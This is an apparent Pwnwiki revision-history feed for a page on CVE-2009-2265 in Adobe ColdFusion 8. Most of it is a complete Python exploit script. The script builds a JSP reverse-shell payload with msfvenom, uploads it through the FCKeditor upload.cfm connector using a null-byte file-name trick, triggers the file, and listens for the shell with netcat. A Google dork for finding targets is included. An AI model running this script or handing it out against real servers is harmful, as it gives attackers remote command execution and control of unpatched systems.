https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2009-2265_Adobe_ColdFusion_8_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2009-2265 Adobe ColdFusion 8 遠程代碼執行漏洞 - Revision history
2026-04-08T21:01:14Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2009-2265_Adobe_ColdFusion_8_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=5875&oldid=prev
Pwnwiki: Marked this version for translation
2021-06-24T09:39:41Z
<p>Marked this version for translation</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 09:39, 24 June 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l1" >Line 1:</td>
<td colspan="2" class="diff-lineno">Line 1:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><languages /></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><languages /></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><translate></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><translate></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>==影響版本==</div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>==影響版本== <ins class="diffchange diffchange-inline"><!--T:1--></ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></translate></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></translate></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Adobe ColdFusion 8</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Adobe ColdFusion 8</div></td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-5874:rev-5875 -->
</table>
Pwnwiki
https://pwnwiki.com/index.php?title=CVE-2009-2265_Adobe_ColdFusion_8_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=5874&oldid=prev
Pwnwiki: Created page with "<languages /> <translate> ==影響版本== </translate> Adobe ColdFusion 8 ==EXP== <pre> # Exploit Title: Adobe ColdFusion 8 - Remote Command Execution (RCE) # Google Dork:..."
2021-06-24T09:39:17Z
<p>Created page with "<languages /> <translate> ==影響版本== </translate> Adobe ColdFusion 8 ==EXP== <pre> # Exploit Title: Adobe ColdFusion 8 - Remote Command Execution (RCE) # Google Dork:..."</p>
<p><b>New page</b></p><div><languages /><br />
<translate><br />
==影響版本==<br />
</translate><br />
Adobe ColdFusion 8<br />
<br />
<br />
==EXP==<br />
<pre><br />
# Exploit Title: Adobe ColdFusion 8 - Remote Command Execution (RCE)<br />
# Google Dork: intext:"adobe coldfusion 8"<br />
# Date: 24/06/2021<br />
# Exploit Author: Pergyz<br />
# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html<br />
# Version: 8<br />
# Tested on: Microsoft Windows Server 2008 R2 Standard<br />
# CVE : CVE-2009-2265<br />
<br />
#!/usr/bin/python3<br />
<br />
from multiprocessing import Process<br />
import io<br />
import mimetypes<br />
import os<br />
import urllib.request<br />
import uuid<br />
<br />
class MultiPartForm:<br />
<br />
def __init__(self):<br />
self.files = []<br />
self.boundary = uuid.uuid4().hex.encode('utf-8')<br />
return<br />
<br />
def get_content_type(self):<br />
return 'multipart/form-data; boundary={}'.format(self.boundary.decode('utf-8'))<br />
<br />
def add_file(self, fieldname, filename, fileHandle, mimetype=None):<br />
body = fileHandle.read()<br />
<br />
if mimetype is None:<br />
mimetype = (mimetypes.guess_type(filename)[0] or 'application/octet-stream')<br />
<br />
self.files.append((fieldname, filename, mimetype, body))<br />
return<br />
<br />
@staticmethod<br />
def _attached_file(name, filename):<br />
return (f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n').encode('utf-8')<br />
<br />
@staticmethod<br />
def _content_type(ct):<br />
return 'Content-Type: {}\r\n'.format(ct).encode('utf-8')<br />
<br />
def __bytes__(self):<br />
buffer = io.BytesIO()<br />
boundary = b'--' + self.boundary + b'\r\n'<br />
<br />
for f_name, filename, f_content_type, body in self.files:<br />
buffer.write(boundary)<br />
buffer.write(self._attached_file(f_name, filename))<br />
buffer.write(self._content_type(f_content_type))<br />
buffer.write(b'\r\n')<br />
buffer.write(body)<br />
buffer.write(b'\r\n')<br />
<br />
buffer.write(b'--' + self.boundary + b'--\r\n')<br />
return buffer.getvalue()<br />
<br />
def execute_payload():<br />
print('\nExecuting the payload...')<br />
print(urllib.request.urlopen(f'http://{rhost}:{rport}/userfiles/file/{filename}.jsp').read().decode('utf-8'))<br />
<br />
def listen_connection():<br />
print('\nListening for connection...')<br />
os.system(f'nc -nlvp {lport}')<br />
<br />
if __name__ == '__main__':<br />
# Define some information<br />
lhost = '10.10.16.4'<br />
lport = 4444<br />
rhost = "10.10.10.11"<br />
rport = 8500<br />
filename = uuid.uuid4().hex<br />
<br />
# Generate a payload that connects back and spawns a command shell<br />
print("\nGenerating a payload...")<br />
os.system(f'msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -o {filename}.jsp')<br />
<br />
# Encode the form data<br />
form = MultiPartForm()<br />
form.add_file('newfile', filename + '.txt', fileHandle=open(filename + '.jsp', 'rb'))<br />
data = bytes(form)<br />
<br />
# Create a request<br />
request = urllib.request.Request(f'http://{rhost}:{rport}/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/{filename}.jsp%00', data=data)<br />
request.add_header('Content-type', form.get_content_type())<br />
request.add_header('Content-length', len(data))<br />
<br />
# Print the request<br />
print('\nPriting request...')<br />
<br />
for name, value in request.header_items():<br />
print(f'{name}: {value}')<br />
<br />
print('\n' + request.data.decode('utf-8'))<br />
<br />
# Send the request and print the response<br />
print('\nSending request and printing response...')<br />
print(urllib.request.urlopen(request).read().decode('utf-8'))<br />
<br />
# Print some information<br />
print('\nPrinting some information for debugging...')<br />
print(f'lhost: {lhost}')<br />
print(f'lport: {lport}')<br />
print(f'rhost: {rhost}')<br />
print(f'rport: {rport}')<br />
print(f'payload: {filename}.jsp')<br />
<br />
# Delete the payload<br />
print("\nDeleting the payload...")<br />
os.system(f'rm {filename}.jsp')<br />
<br />
# Listen for connections and execute the payload<br />
p1 = Process(target=listen_connection)<br />
p1.start()<br />
p2 = Process(target=execute_payload)<br />
p2.start()<br />
p1.join()<br />
p2.join()<br />
<br />
</pre></div>
Pwnwiki